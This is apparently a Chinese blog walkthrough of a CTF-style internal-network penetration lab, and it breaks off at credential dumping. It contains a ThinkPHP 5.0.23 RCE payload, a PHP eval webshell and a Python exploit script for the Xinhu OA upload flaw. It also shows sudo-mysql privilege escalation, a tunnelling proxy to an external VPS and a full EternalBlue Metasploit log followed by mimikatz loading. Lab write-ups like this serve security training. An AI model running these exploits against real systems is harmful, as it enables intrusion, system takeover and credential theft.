Twansh/Eminem
0%

春秋云镜Initial

发表于 更新于
最近发生了挺多烦心事,哎,希望能在未来逐一解决吧

flag1

fscan起手

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
E:\CTFFIT\ONE-FOX集成工具箱_V8公开版_by狐狸\gui_scan\fscan>fscan -h 39.99.138.60

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.99.138.60:80 open
39.99.138.60:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.99.138.60       code:200 len:5578   title:Bootstrap Material Admin
[+] PocScan http://39.99.138.60 poc-yaml-thinkphp5023-method-rce poc1
已完成 2/2
[*] 扫描结束,耗时: 46.6863044s

存在thinkphp的某个rce漏洞,利用thinkphp框架漏洞工具

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
检测所有漏洞中......
=====================================================================
[-] 不存在ThinkPHP 2 RCE
[-] 不存在ThinkPHP 5.0 RCE
[-] 不存在ThinkPHP 5.0.10 construct RCE
[-] 不存在ThinkPHP 5.0.22/5.1.29 RCE
[+] 存在ThinkPHP 5.0.23 RCE
Payload: http://39.99.138.60//?s=captcha&test=-1 Post: _method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1
[-] 不存在ThinkPHP 5.0.24-5.1.30 RCE
[-] 不存在ThinkPHP 5 文件包含漏洞
[-] 不存在ThinkPHP 5 show-id RCE
[-] 不存在ThinkPHP 5 method filter RCE
[-] 不存在ThinkPHP 5 session include
[-] 不存在ThinkPHP 5 SQL注入漏洞 && 敏感信息泄露
[-] 不存在ThinkPHP 5.x 数据库信息泄露
[-] 不存在ThinkPHP 5.x 日志泄露
[-] 不存在ThinkPHP 3.x RCE
[-] 不存在ThinkPHP 3.x 日志泄露
[-] 不存在ThinkPHP 3.x Log RCE
[-] 不存在ThinkPHP 6.x 日志泄露
[-] 不存在ThinkPHP 6 文件包含漏洞
[-] 不存在ThinkPHP 6 session文件写入
[-] 不存在ThinkPHP catch 命令执行漏洞
[-] 不存在ThinkPHP check-code sql注入漏洞
[-] 不存在ThinkPHP multi sql注入 && 信息泄露漏洞
[-] 不存在ThinkPHP orderid sql注入
[-] 不存在ThinkPHP update sql注入
[-] 不存在ThinkPHP recent_xff sql注入

探测出来之后点击getshell之后,就会帮我们上传对应的木马,用webshell管理工具连接即可

alt text

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
检测所有漏洞中......
=====================================================================
[-] 不存在ThinkPHP 2 RCE
[-] 不存在ThinkPHP 5.0 RCE
[-] 不存在ThinkPHP 5.0.10 construct RCE
[-] 不存在ThinkPHP 5.0.22/5.1.29 RCE
[+] 存在ThinkPHP 5.0.23 RCE
Payload: http://39.99.138.60//?s=captcha&test=-1 Post: _method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1
[-] 不存在ThinkPHP 5.0.24-5.1.30 RCE
[-] 不存在ThinkPHP 5 文件包含漏洞
[-] 不存在ThinkPHP 5 show-id RCE
[-] 不存在ThinkPHP 5 method filter RCE
[-] 不存在ThinkPHP 5 session include
[-] 不存在ThinkPHP 5 SQL注入漏洞 && 敏感信息泄露
[-] 不存在ThinkPHP 5.x 数据库信息泄露
[-] 不存在ThinkPHP 5.x 日志泄露
[-] 不存在ThinkPHP 3.x RCE
[-] 不存在ThinkPHP 3.x 日志泄露
[-] 不存在ThinkPHP 3.x Log RCE
[-] 不存在ThinkPHP 6.x 日志泄露
[-] 不存在ThinkPHP 6 文件包含漏洞
[-] 不存在ThinkPHP 6 session文件写入
[-] 不存在ThinkPHP catch 命令执行漏洞
[-] 不存在ThinkPHP check-code sql注入漏洞
[-] 不存在ThinkPHP multi sql注入 && 信息泄露漏洞
[-] 不存在ThinkPHP orderid sql注入
[-] 不存在ThinkPHP update sql注入
[-] 不存在ThinkPHP recent_xff sql注入
[+] http://39.99.138.60//peiqi.php   Pass:peiqi

看到上传的木马peiqi.php,密码是peiqi

使用哥斯拉连上去
alt text

进入之后即可进行命令知悉
alt text

打群友靶机的经验告诉我,这个就是个www-data权限,是远远不够的,需要进行提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
currentDir:/var/www/html/
fileRoot:[/]
currentUser:www-data
osInfo:Linux ubuntu-web01 5.4.0-110-generic #124-Ubuntu SMP Thu Apr 14 19:46:19 UTC 2022 x86_64

/var/www/html/ >id

uid=33(www-data) gid=33(www-data) groups=33(www-data)
/var/www/html/ >sudo -l

Matching Defaults entries for www-data on ubuntu-web01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu-web01:
    (root) NOPASSWD: /usr/bin/mysql
/var/www/html/ >

sudo -l出来,mysql可以利用,参考提权宝典
https://gtfobins.github.io/gtfobins/mysql/

1
2
3
4
/var/www/html/ >sudo mysql -e '\! /bin/sh'


/var/www/html/ >

注意到这里毫无回显,其实是因为这里并不是一个交互式shell,所以无法切换到root的shell,但是我们依然可以读取root的文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

/var/www/html/ >sudo mysql -e '\! tac /root/flag/flag01.txt'

flag01: flag{60b53231-

Congratulations!!! You found the first flag, the next flag may be in a server in the internal network.

░░     ░░ ░░ ░░      ░░   ░░░░░░░   ░░     ░░ ░░      ░░ ░░      ░░░   ░░░░░░░░  
 ██   ░░██░██░██     ░██ ░░███████  ░██   ░░██░██     ░██░██    ░░███ ░░████████ 
  ██ ░░██ ░██░██░░░░░░██░░██     ██ ░██  ░░██ ░██░░░░░░██░██   ░░████░░██  ░░░░██
   ██░██  ░██ ██████████░██      ░██░██░░░██   ██████████░██  ░░██░██░██    █████
  ░░███   ░██  ██  ░░██ ░██      ░██░███████    ██  ░░██ ░██ ░░██ ░██░██         
 ░░██ ██  ░██   ██░░██   ██     ░░██░██   ░██    ██░░██  ░██░░██  ░██ ██      ░░ 
░░██   ██ ░██    ████     ██░░░░░██ ░██░░░░██     ████   ░██░██   ░██  ██░░░░░░██
 ██     ██ ██     ██       ███████   ███████       ██     ████     ██   ████████

第一部分flag,get!

flag2

flag2是在内网的机器中的,我们需要通过哥斯拉把fscan和内网代理搭建的工具传上去

alt text

注意这里fscan是通过大文件上传的方式上传上去的,普通的上传会失败

1
2
3
4
5
6
7
8
9
10
11
/tmp >ls

fscan
linux_x64_agent
/tmp >chmod +x fscan


/tmp >chmod +x linux_x64_agent


/tmp >

回到这里,给两个文件添加可执行权限

然后到vps上开启我们的服务(admin)端

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
linux_x64_admin -l 1122


[*] Starting admin node on port 1122

    .-')    .-') _                  ('\ .-') /'  ('-.      ('\ .-') /'  ('-.                 
   ( OO ). (  OO) )                  '.( OO ),' ( OO ).-.   '.( OO ),' ( OO ).-.             
   (_)---\_)/     '._  .-'),-----. ,--./  .--.   / . --. /,--./  .--.   / . --. /  ,--.   ,--.
   /    _ | |'--...__)( OO'  .-.  '|      |  |   | \-.  \ |      |  |   | \-.  \    \  '.'  / 
   \  :' '. '--.  .--'/   |  | |  ||  |   |  |,.-'-'  |  ||  |   |  |,.-'-'  |  | .-')     /  
    '..'''.)   |  |   \_) |  |\|  ||  |.'.|  |_)\| |_.'  ||  |.'.|  |_)\| |_.'  |(OO  \   /   
   .-._)   \   |  |     \ |  | |  ||         |   |  .-.  ||         |   |  .-.  | |   /  /\_  
   \       /   |  |      ''  '-'  '|   ,'.   |   |  | |  ||   ,'.   |   |  | |  | '-./  /.__) 
    '-----'    '--'        '-----' '--'   '--'   '--' '--''--'   '--'   '--' '--'   '--'      
			            { v2.2  Author:ph4ntom }
[*] Waiting for new connection...

agent端就正常连接即可

服务端依旧搭建socks代理

1
2
3
4
5
6
(admin) >> use 0 
(node 0) >> socks 1123
[*] Trying to listen on 0.0.0.0:1123......
[*] Waiting for agent's response......
[*] Socks start successfully!
(node 0) >> 
1
2
3
4
5
6
7
8
(node 0) >> shell
[*] Waiting for response.....
bash: cannot set terminal process group (734): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu-web01:/tmp$ whoami
whoami
www-data
www-data@ubuntu-web01:/tmp$

获取交互式shell,前面因为不是交互式shell而无法提权,这里可以进行提权

1
2
3
4
www-data@ubuntu-web01:/tmp$ sudo mysql -e '\! /bin/sh'
sudo mysql -e '\! /bin/sh'
whoami
root

得到了root权限

用script语句升级一下为一个较为完全的shell

1
2
3
4
5
script -qc /bin/bash /dev/null
root@ubuntu-web01:/tmp# whoami
whoami
root
root@ubuntu-web01:/tmp# 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@ubuntu-web01:/tmp# ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.1.15  netmask 255.255.0.0  broadcast 172.22.255.255
        inet6 fe80::216:3eff:fe2b:eeb4  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:2b:ee:b4  txqueuelen 1000  (Ethernet)
        RX packets 148714  bytes 206304284 (206.3 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 44225  bytes 6093177 (6.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1554  bytes 145035 (145.0 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1554  bytes 145035 (145.0 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

ifconfig查看内网网段信息,然后使用fscan进行扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
root@ubuntu-web01:/tmp# ./fscan -h 172.22.1.0/24
./fscan -h 172.22.1.0/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.1.15     is alive
(icmp) Target 172.22.1.2      is alive
(icmp) Target 172.22.1.21     is alive
(icmp) Target 172.22.1.18     is alive
[*] Icmp alive hosts len is: 4
172.22.1.18:3306 open
172.22.1.18:445 open
172.22.1.21:445 open
172.22.1.2:445 open
172.22.1.15:22 open
172.22.1.18:139 open
172.22.1.21:139 open
172.22.1.2:139 open
172.22.1.18:135 open
172.22.1.21:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.2:88 open
[*] alive ports len is: 14
start vulscan
[*] WebTitle http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[*] NetInfo 
[*]172.22.1.21
   [->]XIAORANG-WIN7
   [->]172.22.1.21
[*] NetInfo 
[*]172.22.1.2
   [->]DC01
   [->]172.22.1.2
[*] NetInfo 
[*]172.22.1.18
   [->]XIAORANG-OA01
   [->]172.22.1.18
[*] NetBios 172.22.1.2      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[*] OsInfo 172.22.1.2	(Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[+] MS17-010 172.22.1.21	(Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] WebTitle http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统
[*] NetBios 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
已完成 14/14
[*] 扫描结束,耗时: 8.048895233s

看这四台机器

1
2
3
4
(icmp) Target 172.22.1.15     is alive
(icmp) Target 172.22.1.2      is alive
(icmp) Target 172.22.1.21     is alive
(icmp) Target 172.22.1.18     is alive

15我们已经拿下了,21存在一个MS17-010,18是一个交信呼协同办公系统的玩意,2则是DC01

现在需要建立本机的内网代理,方便我们对内网进行攻击

利用proxifier搭建代理,这里不多说

访问172.72.1.18,这里存在弱口令admin/admin123

同时这个信呼OA存在漏洞,我们可以直接用exp来打

这里弄一个1.php

1
<?php eval($_POST["1"]);?>

这里弄一个脚本exp.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import requests
 
 
session = requests.session()
 
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
 
data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}
 
 
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
 
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
 
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
 
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

然后通过proxychains来打

1
2
3
4
5
6
7
8
┌──(root㉿kali)-[/home/kali]
└─# proxychains python3 test.py                                                                                           
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.18:80  ...  OK
<br />
<b>Notice</b>:  Undefined offset: 1 in <b>C:\phpStudy\PHPTutorial\WWW\upload\2025-11\05_20335282.php</b> on line <b>1</b><br />

成功打入
用相对路径访问一下

alt text

看一下,发现是存在的,使用哥斯拉连接

1
2
3
4
5
6
7
8
9
currentDir:C:/phpStudy/PHPTutorial/WWW/upload/2025-11/
fileRoot:[C:/]
currentUser:SYSTEM
osInfo:Windows NT XIAORANG-OA01 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) i586

C:/phpStudy/PHPTutorial/WWW/upload/2025-11/ >whoami

nt authority\system
C:/phpStudy/PHPTutorial/WWW/upload/2025-11/ >

直接就是system用户,那我们直接拿flag
alt text

1
2
3
4
5
6
7
8
9
10
11
12
13
 ___    ___ ___  ________  ________  ________  ________  ________   ________     
|\  \  /  /|\  \|\   __  \|\   __  \|\   __  \|\   __  \|\   ___  \|\   ____\    
\ \  \/  / | \  \ \  \|\  \ \  \|\  \ \  \|\  \ \  \|\  \ \  \\ \  \ \  \___|    
 \ \    / / \ \  \ \   __  \ \  \\\  \ \   _  _\ \   __  \ \  \\ \  \ \  \  ___  
  /     \/   \ \  \ \  \ \  \ \  \\\  \ \  \\  \\ \  \ \  \ \  \\ \  \ \  \|\  \ 
 /  /\   \    \ \__\ \__\ \__\ \_______\ \__\\ _\\ \__\ \__\ \__\\ \__\ \_______\
/__/ /\ __\    \|__|\|__|\|__|\|_______|\|__|\|__|\|__|\|__|\|__| \|__|\|_______|
|__|/ \|__|                                                                      


flag02: 2ce3-4813-87d4-

Awesome! ! ! You found the second flag, now you can attack the domain controller.

flag3

21这台机器是存在永恒之蓝的,直接对这个下手看看

使用msf,先通过proxychains限定一下msf走的流量

然后搜索ms17相关的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
┌──(root㉿kali)-[/home/kali]
└─# proxychains msfconsole
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Metasploit tip: Enable verbose logging with set VERBOSE true
[proxychains] DLL init: proxychains-ng 4.17le...|
                                                  

 ______________________________________________________________________________
|                                                                              |
|                   METASPLOIT CYBER MISSILE COMMAND V5                        |
|______________________________________________________________________________|
      \                                  /                      /
       \     .                          /                      /            x
        \                              /                      /
         \                            /          +           /
          \            +             /                      /
           *                        /                      /
                                   /      .               /
    X                             /                      /            X
                                 /                     ###
                                /                     # % #
                               /                       ###
                      .       /
     .                       /      .            *           .
                            /
                           *
                  +                       *

                                       ^
####      __     __     __          #######         __     __     __        ####
####    /    \ /    \ /    \      ###########     /    \ /    \ /    \      ####
################################################################################
################################################################################
# WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
                                                           https://metasploit.com


       =[ metasploit v6.4.84-dev                                ]
+ -- --=[ 2,547 exploits - 1,309 auxiliary - 1,680 payloads     ]
+ -- --=[ 431 post - 49 encoders - 13 nops - 9 evasion          ]

Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project

[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
msf > search ms17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17

Matching Modules
================

   #   Name                                                  Disclosure Date  Rank     Check  Description
   -   ----                                                  ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue              2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                         .                .        .      .
   2     \_ target: Windows 7                                .                .        .      .
   3     \_ target: Windows Embedded Standard 7              .                .        .      .
   4     \_ target: Windows Server 2008 R2                   .                .        .      .
   5     \_ target: Windows 8                                .                .        .      .
   6     \_ target: Windows 8.1                              .                .        .      .
   7     \_ target: Windows Server 2012                      .                .        .      .
   8     \_ target: Windows 10 Pro                           .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation         .                .        .      .
   10  exploit/windows/smb/ms17_010_psexec                   2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   11    \_ target: Automatic                                .                .        .      .
   12    \_ target: PowerShell                               .                .        .      .
   13    \_ target: Native upload                            .                .        .      .
   14    \_ target: MOF upload                               .                .        .      .
   15    \_ AKA: ETERNALSYNERGY                              .                .        .      .
   16    \_ AKA: ETERNALROMANCE                              .                .        .      .
   17    \_ AKA: ETERNALCHAMPION                             .                .        .      .
   18    \_ AKA: ETERNALBLUE                                 .                .        .      .
   19  auxiliary/admin/smb/ms17_010_command                  2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   20    \_ AKA: ETERNALSYNERGY                              .                .        .      .
   21    \_ AKA: ETERNALROMANCE                              .                .        .      .
   22    \_ AKA: ETERNALCHAMPION                             .                .        .      .
   23    \_ AKA: ETERNALBLUE                                 .                .        .      .
   24  auxiliary/scanner/smb/smb_ms17_010                    .                normal   No     MS17-010 SMB RCE Detection
   25    \_ AKA: DOUBLEPULSAR                                .                .        .      .
   26    \_ AKA: ETERNALBLUE                                 .                .        .      .
   27  exploit/windows/fileformat/office_ms17_11882          2017-11-15       manual   No     Microsoft Office CVE-2017-11882
   28  auxiliary/admin/mssql/mssql_escalate_execute_as       .                normal   No     Microsoft SQL Server Escalate EXECUTE AS
   29  auxiliary/admin/mssql/mssql_escalate_execute_as_sqli  .                normal   No     Microsoft SQL Server SQLi Escalate Execute AS
   30  exploit/windows/smb/smb_doublepulsar_rce              2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
   31    \_ target: Execute payload (x64)                    .                .        .      .
   32    \_ target: Neutralize implant                       .                .        .      .


Interact with a module by name or index. For example info 32, use 32 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'

[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
msf > use exploit/windows/smb/ms17_010_eternalblue
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp_uuid
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
payload => windows/x64/meterpreter/bind_tcp_uuid
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 172.22.1.21
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
RHOSTS => 172.22.1.21
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
msf exploit(windows/smb/ms17_010_eternalblue) > run
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[*] 172.22.1.21:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:445  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:135  ...  OK
[+] 172.22.1.21:445       - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/recog-3.1.21/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression
[*] 172.22.1.21:445       - Scanned 1 of 1 hosts (100% complete)
[+] 172.22.1.21:445 - The target is vulnerable.
[*] 172.22.1.21:445 - Connecting to target for exploitation.
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:445  ...  OK
[+] 172.22.1.21:445 - Connection established for exploitation.
[+] 172.22.1.21:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.22.1.21:445 - CORE raw buffer dump (53 bytes)
[*] 172.22.1.21:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 172.22.1.21:445 - 0x00000010  30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73  008 R2 Enterpris
[*] 172.22.1.21:445 - 0x00000020  65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50  e 7601 Service P
[*] 172.22.1.21:445 - 0x00000030  61 63 6b 20 31                                   ack 1           
[+] 172.22.1.21:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.22.1.21:445 - Trying exploit with 12 Groom Allocations.
[*] 172.22.1.21:445 - Sending all but last fragment of exploit packet
[*] 172.22.1.21:445 - Starting non-paged pool grooming
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:445  ...  OK
[+] 172.22.1.21:445 - Sending SMBv2 buffers
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:445  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:445  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:445  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:445  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:445  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:445  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:445  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:445  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:445  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:445  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:445  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:445  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:445  ...  OK
[+] 172.22.1.21:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.22.1.21:445 - Sending final SMBv2 buffers.
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:445  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:445  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:445  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:445  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:445  ...  OK
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:445  ...  OK
[*] 172.22.1.21:445 - Sending last fragment of exploit packet!
[*] 172.22.1.21:445 - Receiving response from exploit packet
[+] 172.22.1.21:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.22.1.21:445 - Sending egg to corrupted connection.
[*] 172.22.1.21:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 172.22.1.21:4444
[proxychains] Strict chain  ...  38.55.99.185:1123  ...  172.22.1.21:4444  ...  OK
[*] Sending stage (203846 bytes) to 172.22.1.21
[proxychains] DLL init: proxychains-ng 4.17
[*] Meterpreter session 1 opened (192.168.5.128:41824 -> 38.55.99.185:1123) at 2025-11-05 20:48:51 +0800
[+] 172.22.1.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.22.1.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.22.1.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17

关于这部分的解释,参考deepseek即可
https://chat.deepseek.com/share/djha7r1etl8m9x4ss0

然后去获取域内用户的hash,最后连接即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
meterpreter > getuid
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Server username: NT AUTHORITY\SYSTEM
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
meterpreter > load kiwi
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
